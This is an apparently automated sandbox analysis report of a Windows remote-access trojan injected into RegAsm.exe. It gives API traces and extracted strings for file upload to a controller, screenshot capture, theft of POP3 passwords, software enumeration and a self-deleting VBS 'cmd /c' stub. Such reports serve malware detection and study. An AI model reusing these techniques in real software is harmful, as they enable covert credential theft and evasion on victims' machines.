                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-255920310
                                                          • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                          • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable
                                                          • String ID: pB\
                                                          • API String ID: 1464849758-186810650
                                                          • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                          • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                          • API String ID: 4218353326-3023110444
                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040CE07
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                          • CopyFileW.KERNEL32 ref: 0040CED0
                                                          • _wcslen.LIBCMT ref: 0040CEE6
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                          • CopyFileW.KERNEL32 ref: 0040CF84
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                          • _wcslen.LIBCMT ref: 0040CFC6
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                          • CloseHandle.KERNEL32 ref: 0040D02D
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                          • ExitProcess.KERNEL32 ref: 0040D062
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                          • API String ID: 1579085052-2309681474
                                                          • Opcode ID: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                          • Opcode Fuzzy Hash: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041C036
                                                          • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                          • lstrlenW.KERNEL32(?), ref: 0041C067
                                                          • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                          • _wcslen.LIBCMT ref: 0041C13B
                                                          • FindVolumeClose.KERNEL32 ref: 0041C15B
                                                          • GetLastError.KERNEL32 ref: 0041C173
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                          • lstrcatW.KERNEL32 ref: 0041C1B9
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                          • GetLastError.KERNEL32 ref: 0041C1D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                          • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                          • API String ID: 4218353326-230879103
                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                          • RegEnumKeyExA.ADVAPI32 ref: 0041C6F5
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                          • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                          • GetCursorPos.USER32(?), ref: 0041D5E9
                                                          • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                          • ExitProcess.KERNEL32 ref: 0041D665
                                                          • CreatePopupMenu.USER32 ref: 0041D66B
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                          • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                          • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                          • Opcode Fuzzy Hash: c43f3e9ef6aa90fc617fbeb0adb34ec0a6d023508037e2c59db227b807854484
                                                          • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408CE3
                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                          • __aulldiv.LIBCMT ref: 00408D4D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FAE
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                          • API String ID: 3086580692-2582957567
                                                          • Opcode ID: fea408a94735cd7515c3ead40e30c92245666238b083aeda4bc882dc6da47b42
                                                          • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                          • Opcode Fuzzy Hash: fea408a94735cd7515c3ead40e30c92245666238b083aeda4bc882dc6da47b42
                                                          • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00419FB9
                                                          • GdiplusStartup.GDIPLUS(he[,?,00000000), ref: 00419FEB
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                          • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                          • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: he[$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                          • API String ID: 489098229-1381328619
                                                          • Opcode ID: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                          • Opcode Fuzzy Hash: f9c76c899fb4e7c55224b1c9c4b3e49dcb3f2a3f76cdcd98f3a23b5209652d96
                                                          • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                          • _free.LIBCMT ref: 10007CFB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10007D1D
                                                          • _free.LIBCMT ref: 10007D32
                                                          • _free.LIBCMT ref: 10007D3D
                                                          • _free.LIBCMT ref: 10007D5F
                                                          • _free.LIBCMT ref: 10007D72
                                                          • _free.LIBCMT ref: 10007D80
                                                          • _free.LIBCMT ref: 10007D8B
                                                          • _free.LIBCMT ref: 10007DC3
                                                          • _free.LIBCMT ref: 10007DCA
                                                          • _free.LIBCMT ref: 10007DE7
                                                          • _free.LIBCMT ref: 10007DFF
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                          • _free.LIBCMT ref: 004512FF
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00451321
                                                          • _free.LIBCMT ref: 00451336
                                                          • _free.LIBCMT ref: 00451341
                                                          • _free.LIBCMT ref: 00451363
                                                          • _free.LIBCMT ref: 00451376
                                                          • _free.LIBCMT ref: 00451384
                                                          • _free.LIBCMT ref: 0045138F
                                                          • _free.LIBCMT ref: 004513C7
                                                          • _free.LIBCMT ref: 004513CE
                                                          • _free.LIBCMT ref: 004513EB
                                                          • _free.LIBCMT ref: 00451403
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                            • Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                                            • Part of subcall function 004136F8: RegQueryValueExA.KERNEL32 ref: 0041372D
                                                            • Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                          • ExitProcess.KERNEL32 ref: 0040D9C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open$[
                                                          • API String ID: 1913171305-1019883351
                                                          • Opcode ID: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                          • Opcode Fuzzy Hash: 524a6ee67eac097be960b5c691f7399128dd62eb0b1fd7f322d11bf520c9c063
                                                          • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                          • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                          • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                          APIs
                                                            • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                          • GetLastError.KERNEL32 ref: 00455CEF
                                                          • __dosmaperr.LIBCMT ref: 00455CF6
                                                          • GetFileType.KERNEL32 ref: 00455D02
                                                          • GetLastError.KERNEL32 ref: 00455D0C
                                                          • __dosmaperr.LIBCMT ref: 00455D15
                                                          • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                          • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                          • GetLastError.KERNEL32 ref: 00455EB1
                                                          • __dosmaperr.LIBCMT ref: 00455EB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                          • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                          • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                          • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
